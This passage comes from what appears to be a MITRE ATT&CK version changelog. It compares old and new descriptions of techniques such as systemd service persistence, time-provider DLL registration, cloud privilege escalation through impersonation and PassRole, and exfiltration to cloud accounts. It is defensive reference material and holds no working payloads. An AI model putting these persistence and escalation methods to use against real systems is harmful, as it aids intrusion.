descriptionAdversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI) System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1124] System Time Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1An adversary may gather the system time and/or time zone frot1An adversary may gather the system time and/or time zone set
>m a local or remote system. The system time is set and store>tings from a local or remote system. The system time is set 
>d by the Windows Time Service within a domain to maintain ti>and stored by services, such as the Windows Time Service on 
>me synchronization between systems and services in an enterp>Windows or <code>systemsetup</code> on macOS.(Citation: MSDN
>rise network. (Citation: MSDN System Time)(Citation: Technet> System Time)(Citation: Technet Windows Time Service)(Citati
> Windows Time Service)  System time information may be gathe>on: systemsetup mac time) These time settings may also be sy
>red in a number of ways, such as with [Net](https://attack.m>nchronized between systems and services in an enterprise net
>itre.org/software/S0039) on Windows by performing <code>net >work, typically accomplished with a network time server with
>time \\hostname</code> to gather the system time on a remote>in a domain.(Citation: Mac Time Sync)(Citation: linux system
> system. The victim's time zone may also be inferred from th> time)  System time information may be gathered in a number 
>e current system time or gathered by using <code>w32tm /tz</>of ways, such as with [Net](https://attack.mitre.org/softwar
>code>.(Citation: Technet Windows Time Service)  On network d>e/S0039) on Windows by performing <code>net time \\hostname<
>evices, [Network Device CLI](https://attack.mitre.org/techni>/code> to gather the system time on a remote system. The vic
>ques/T1059/008) commands such as `show clock detail` can be >tim's time zone may also be inferred from the current system
>used to see the current time configuration.(Citation: show_c> time or gathered by using <code>w32tm /tz</code>.(Citation:
>lock_detail_cisco_cmd)  This information could be useful for> Technet Windows Time Service) In addition, adversaries can 
> performing other techniques, such as executing a file with >discover device uptime through functions such as <code>GetTi
>a [Scheduled Task/Job](https://attack.mitre.org/techniques/T>ckCount()</code> to determine how long it has been since the
>1053)(Citation: RSA EU12 They're Inside), or to discover loc> system booted up.(Citation: Virtualization/Sandbox Evasion)
>ality information based on time zone to assist in victim tar>  On network devices, [Network Device CLI](https://attack.mi
>geting (i.e. [System Location Discovery](https://attack.mitr>tre.org/techniques/T1059/008) commands such as `show clock d
>e.org/techniques/T1614)). Adversaries may also use knowledge>etail` can be used to see the current time configuration.(Ci
> of system time as part of a time bomb, or delaying executio>tation: show_clock_detail_cisco_cmd)  In addition, system ca
>n until a specified date/time.(Citation: AnyRun TimeBomb)>lls – such as <code>time()</code> – have been used to collec
 >t the current time on Linux devices.(Citation: MAGNET GOBLIN
 >) On macOS systems, adversaries may use commands such as <co
 >de>systemsetup -gettimezone</code> or <code>timeIntervalSinc
 >eNow</code> to gather current time zone information or curre
 >nt date and time.(Citation: System Information Discovery Tec
 >hnique)(Citation: ESET DazzleSpy Jan 2022)  This information
 > could be useful for performing other techniques, such as ex
 >ecuting a file with a [Scheduled Task/Job](https://attack.mi
 >tre.org/techniques/T1053)(Citation: RSA EU12 They're Inside)
 >, or to discover locality information based on time zone to 
 >assist in victim targeting (i.e. [System Location Discovery]
 >(https://attack.mitre.org/techniques/T1614)). Adversaries ma
 >y also use knowledge of system time as part of a time bomb, 
 >or delaying execution until a specified date/time.(Citation:
 > AnyRun TimeBomb)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 23:37:22.508000+00:002024-04-16 12:50:15.929000+00:00
descriptionAn adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time) System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion) On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022) This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'systemsetup mac time', 'description': 'Apple Support. (n.d.). About systemsetup in Remote Desktop. Retrieved March 27, 2024.', 'url': 'https://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac'}
external_references{'source_name': 'linux system time', 'description': 'ArchLinux. (2024, February 1). System Time. Retrieved March 27, 2024.', 'url': 'https://wiki.archlinux.org/title/System_time'}
external_references{'source_name': 'MAGNET GOBLIN', 'description': 'Check Point Research. (2024, March 8). MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES. Retrieved March 27, 2024.', 'url': 'https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/'}
external_references{'source_name': 'Mac Time Sync', 'description': "Cone, Matt. (2021, January 14). Synchronize your Mac's Clock with a Time Server. Retrieved March 27, 2024.", 'url': 'https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/'}
external_references{'source_name': 'ESET DazzleSpy Jan 2022', 'description': 'M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.', 'url': 'https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/'}
external_references{'source_name': 'System Information Discovery Technique', 'description': 'YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). The System Information Discovery Technique Explained - MITRE ATT&CK T1082. Retrieved March 27, 2024.', 'url': 'https://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-attack-t1082'}
external_references{'source_name': 'Virtualization/Sandbox Evasion', 'description': 'YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). Virtualization/Sandbox Evasion - How Attackers Avoid Malware Analysis. Retrieved December 26, 2023.', 'url': 'https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-analysis'}
x_mitre_platformsLinux
x_mitre_platformsmacOS

[T1543.002] Create or Modify System Process: Systemd Service

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may create or modify systemd services to repeatet1Adversaries may create or modify systemd services to repeate
>dly execute malicious payloads as part of persistence. Syste>dly execute malicious payloads as part of persistence. Syste
>md is a system and service manager commonly used for managin>md is a system and service manager commonly used for managin
>g background daemon processes (also known as services) and o>g background daemon processes (also known as services) and o
>ther system resources.(Citation: Linux man-pages: systemd Ja>ther system resources.(Citation: Linux man-pages: systemd Ja
>nuary 2014) Systemd is the default initialization (init) sys>nuary 2014) Systemd is the default initialization (init) sys
>tem on many Linux distributions replacing legacy init system>tem on many Linux distributions replacing legacy init system
>s, including SysVinit and Upstart, while remaining backwards>s, including SysVinit and Upstart, while remaining backwards
> compatible.    Systemd utilizes unit configuration files wi> compatible.    Systemd utilizes unit configuration files wi
>th the `.service` file extension to encode information about>th the `.service` file extension to encode information about
> a service's process. By default, system level unit files ar> a service's process. By default, system level unit files ar
>e stored in the `/systemd/system` directory of the root owne>e stored in the `/systemd/system` directory of the root owne
>d directories (`/`). User level unit files are stored in the>d directories (`/`). User level unit files are stored in the
> `/systemd/user` directories of the user owned directories (> `/systemd/user` directories of the user owned directories (
>`$HOME`).(Citation: lambert systemd 2022)   Inside the `.ser>`$HOME`).(Citation: lambert systemd 2022)   Inside the `.ser
>vice` unit files, the following directives are used to execu>vice` unit files, the following directives are used to execu
>te commands:(Citation: freedesktop systemd.service)    * `Ex>te commands:(Citation: freedesktop systemd.service)    * `Ex
>ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe>ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe
>cute when a service is started manually by `systemctl` or on>cute when a service is started manually by `systemctl` or on
> system start if the service is set to automatically start. > system start if the service is set to automatically start. 
>* `ExecReload` directive executes when a service restarts.  >* `ExecReload` directive executes when a service restarts.  
>* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e>* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e
>xecute when a service is stopped.    Adversaries have create>xecute when a service is stopped.    Adversaries have create
>d new service files, altered the commands a `.service` file’>d new service files, altered the commands a `.service` file’
>s directive executes, and modified the user directive a `.se>s directive executes, and modified the user directive a `.se
>rvice` file executes as, which could result in privilege esc>rvice` file executes as, which could result in privilege esc
>alation. Adversaries may also place symbolic links in these >alation. Adversaries may also place symbolic links in these 
>directories, enabling systemd to find these payloads regardl>directories, enabling systemd to find these payloads regardl
>ess of where they reside on the filesystem.(Citation: Anomal>ess of where they reside on the filesystem.(Citation: Anomal
>i Rocke March 2019)(Citation: airwalk backdoor unix systems)>i Rocke March 2019)(Citation: airwalk backdoor unix systems)
>(Citation: Rapid7 Service Persistence 22JUNE2016) >(Citation: Rapid7 Service Persistence 22JUNE2016)   The .ser
 >vice file’s User directive can be used to run service as a s
 >pecific user, which could result in privilege escalation bas
 >ed on specific user/group permissions. 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-09 16:19:01.408000+00:002024-02-15 14:19:22.282000+00:00
descriptionAdversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) * `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start. * `ExecReload` directive executes when a service restarts. * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) * `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start. * `ExecReload` directive executes when a service restarts. * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
x_mitre_version1.41.5

[T1548.005] Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse permission configurations that allow tt1Adversaries may abuse permission configurations that allow t
>hem to gain temporarily elevated access to cloud resources. >hem to gain temporarily elevated access to cloud resources. 
>Many cloud environments allow administrators to grant user o>Many cloud environments allow administrators to grant user o
>r service accounts permission to request just-in-time access>r service accounts permission to request just-in-time access
> to roles, impersonate other accounts, pass roles onto resou> to roles, impersonate other accounts, pass roles onto resou
>rces and services, or otherwise gain short-term access to a >rces and services, or otherwise gain short-term access to a 
>set of privileges that may be distinct from their own.   Jus>set of privileges that may be distinct from their own.   Jus
>t-in-time access is a mechanism for granting additional role>t-in-time access is a mechanism for granting additional role
>s to cloud accounts in a granular, temporary manner. This al>s to cloud accounts in a granular, temporary manner. This al
>lows accounts to operate with only the permissions they need>lows accounts to operate with only the permissions they need
> on a daily basis, and to request additional permissions as > on a daily basis, and to request additional permissions as 
>necessary. Sometimes just-in-time access requests are config>necessary. Sometimes just-in-time access requests are config
>ured to require manual approval, while other times the desir>ured to require manual approval, while other times the desir
>ed permissions are automatically granted.(Citation: Google C>ed permissions are automatically granted.(Citation: Azure Ju
>loud Just in Time Access 2023)(Citation: Azure Just in Time >st in Time Access 2023)  Account impersonation allows user o
>Access 2023)  Account impersonation allows user or service a>r service accounts to temporarily act with the permissions o
>ccounts to temporarily act with the permissions of another a>f another account. For example, in GCP users with the `iam.s
>ccount. For example, in GCP users with the `iam.serviceAccou>erviceAccountTokenCreator` role can create temporary access 
>ntTokenCreator` role can create temporary access tokens or s>tokens or sign arbitrary payloads with the permissions of a 
>ign arbitrary payloads with the permissions of a service acc>service account, while service accounts with domain-wide del
>ount.(Citation: Google Cloud Service Account Authentication >egation permission are permitted to impersonate Google Works
>Roles) In Exchange Online, the `ApplicationImpersonation` ro>pace accounts.(Citation: Google Cloud Service Account Authen
>le allows a service account to use the permissions associate>tication Roles)(Citation: Hunters Domain Wide Delegation Goo
>d with specified user accounts.(Citation: Microsoft Imperson>gle Workspace 2023)(Citation: Google Cloud Just in Time Acce
>ation and EWS in Exchange)   Many cloud environments also in>ss 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain
>clude mechanisms for users to pass roles to resources that a> Wide Delegation 2023) In Exchange Online, the `ApplicationI
>llow them to perform tasks and authenticate to other service>mpersonation` role allows a service account to use the permi
>s. While the user that creates the resource does not directl>ssions associated with specified user accounts.(Citation: Mi
>y assume the role they pass to it, they may still be able to>crosoft Impersonation and EWS in Exchange)   Many cloud envi
> take advantage of the role's access -- for example, by conf>ronments also include mechanisms for users to pass roles to 
>iguring the resource to perform certain actions with the per>resources that allow them to perform tasks and authenticate 
>missions it has been granted. In AWS, users with the `PassRo>to other services. While the user that creates the resource 
>le` permission can allow a service they create to assume a g>does not directly assume the role they pass to it, they may 
>iven role, while in GCP, users with the `iam.serviceAccountU>still be able to take advantage of the role's access -- for 
>ser` role can attach a service account to a resource.(Citati>example, by configuring the resource to perform certain acti
>on: AWS PassRole)(Citation: Google Cloud Service Account Aut>ons with the permissions it has been granted. In AWS, users 
>hentication Roles)  While users require specific role assign>with the `PassRole` permission can allow a service they crea
>ments in order to use any of these features, cloud administr>te to assume a given role, while in GCP, users with the `iam
>ators may misconfigure permissions. This could result in esc>.serviceAccountUser` role can attach a service account to a 
>alation paths that allow adversaries to gain access to resou>resource.(Citation: AWS PassRole)(Citation: Google Cloud Ser
>rces beyond what was originally intended.(Citation: Rhino Go>vice Account Authentication Roles)  While users require spec
>ogle Cloud Privilege Escalation)(Citation: Rhino Security La>ific role assignments in order to use any of these features,
>bs AWS Privilege Escalation)  **Note:** this technique is di> cloud administrators may misconfigure permissions. This cou
>stinct from [Additional Cloud Roles](https://attack.mitre.or>ld result in escalation paths that allow adversaries to gain
>g/techniques/T1098/003), which involves assigning permanent > access to resources beyond what was originally intended.(Ci
>roles to accounts rather than abusing existing permissions s>tation: Rhino Google Cloud Privilege Escalation)(Citation: R
>tructures to gain temporarily elevated access to resources. >hino Security Labs AWS Privilege Escalation)  **Note:** this
>However, adversaries that compromise a sufficiently privileg> technique is distinct from [Additional Cloud Roles](https:/
>ed account may grant another account they control [Additiona>/attack.mitre.org/techniques/T1098/003), which involves assi
>l Cloud Roles](https://attack.mitre.org/techniques/T1098/003>gning permanent roles to accounts rather than abusing existi
>) that would allow them to also abuse these features. This m>ng permissions structures to gain temporarily elevated acces
>ay also allow for greater stealth than would be had by direc>s to resources. However, adversaries that compromise a suffi
>tly using the highly privileged account, especially when log>ciently privileged account may grant another account they co
>s do not clarify when role impersonation is taking place.(Ci>ntrol [Additional Cloud Roles](https://attack.mitre.org/tech
>tation: CrowdStrike StellarParticle January 2022)>niques/T1098/003) that would allow them to also abuse these 
 >features. This may also allow for greater stealth than would
 > be had by directly using the highly privileged account, esp
 >ecially when logs do not clarify when role impersonation is 
 >taking place.(Citation: CrowdStrike StellarParticle January 
 >2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:38:56.602000+00:002024-03-28 15:30:09.313000+00:00
descriptionAdversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023) Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles) While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation) **Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023) Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles) While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation) **Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Hunters Domain Wide Delegation Google Workspace 2023', 'description': 'Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.', 'url': 'https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover'}
external_references{'source_name': 'Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023', 'description': "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.", 'url': 'https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/'}
x_mitre_platformsGoogle Workspace

[T1547.003] Boot or Logon Autostart Execution: Time Providers

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse time providers to execute DLLs when tht1Adversaries may abuse time providers to execute DLLs when th
>e system boots. The Windows Time service (W32Time) enables t>e system boots. The Windows Time service (W32Time) enables t
>ime synchronization across and within domains.(Citation: Mic>ime synchronization across and within domains.(Citation: Mic
>rosoft W32Time Feb 2018) W32Time time providers are responsi>rosoft W32Time Feb 2018) W32Time time providers are responsi
>ble for retrieving time stamps from hardware/network resourc>ble for retrieving time stamps from hardware/network resourc
>es and outputting these values to other network clients.(Cit>es and outputting these values to other network clients.(Cit
>ation: Microsoft TimeProvider)  Time providers are implement>ation: Microsoft TimeProvider)  Time providers are implement
>ed as dynamic-link libraries (DLLs) that are registered in t>ed as dynamic-link libraries (DLLs) that are registered in t
>he subkeys of  <code>HKEY_LOCAL_MACHINE\System\CurrentContro>he subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\S
>lSet\Services\W32Time\TimeProviders\</code>.(Citation: Micro>ervices\W32Time\TimeProviders\`.(Citation: Microsoft TimePro
>soft TimeProvider) The time provider manager, directed by th>vider) The time provider manager, directed by the service co
>e service control manager, loads and starts time providers l>ntrol manager, loads and starts time providers listed and en
>isted and enabled under this key at system startup and/or wh>abled under this key at system startup and/or whenever param
>enever parameters are changed.(Citation: Microsoft TimeProvi>eters are changed.(Citation: Microsoft TimeProvider)  Advers
>der)  Adversaries may abuse this architecture to establish p>aries may abuse this architecture to establish persistence, 
>ersistence, specifically by registering and enabling a malic>specifically by creating a new arbitrarily named subkey  poi
>ious DLL as a time provider. Administrator privileges are re>nting to a malicious DLL in the `DllName` value. Administrat
>quired for time provider registration, though execution will>or privileges are required for time provider registration, t
> run in context of the Local Service account.(Citation: Gith>hough execution will run in context of the Local Service acc
>ub W32Time Oct 2017)>ount.(Citation: Github W32Time Oct 2017)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:31:16.715000+00:002024-04-12 02:34:58.003000+00:00
descriptionAdversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsHarun Küßner

[T1537] Transfer Data to Cloud Account

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may exfiltrate data by transferring the data, int1Adversaries may exfiltrate data by transferring the data, in
>cluding backups of cloud environments, to another cloud acco>cluding through sharing/syncing and creating backups of clou
>unt they control on the same service to avoid typical file t>d environments, to another cloud account they control on the
>ransfers/downloads and network-based exfiltration detection.> same service.  A defender who is monitoring for large trans
>  A defender who is monitoring for large transfers to outsid>fers to outside the cloud environment through normal file tr
>e the cloud environment through normal file transfers or ove>ansfers or over command and control channels may not be watc
>r command and control channels may not be watching for data >hing for data transfers to another account within the same c
>transfers to another account within the same cloud provider.>loud provider. Such transfers may utilize existing cloud pro
> Such transfers may utilize existing cloud provider APIs and>vider APIs and the internal address space of the cloud provi
> the internal address space of the cloud provider to blend i>der to blend into normal traffic or avoid data transfers ove
>nto normal traffic or avoid data transfers over external net>r external network interfaces.(Citation: TLDRSec AWS Attacks
>work interfaces.  Incidents have been observed where adversa>)  Adversaries may also use cloud-native mechanisms to share
>ries have created backups of cloud instances and transferred> victim data with adversary-controlled cloud accounts, such 
> them to separate accounts.(Citation: DOJ GRU Indictment Jul>as creating anonymous file sharing links or, in Azure, a sha
> 2018) >red access signature (SAS) URI.(Citation: Microsoft Azure St
 >orage Shared Access Signature)  Incidents have been observed
 > where adversaries have created backups of cloud instances a
 >nd transferred them to separate accounts.(Citation: DOJ GRU 
 >Indictment Jul 2018) 

New Mitigations:

Dropped Mitigations:

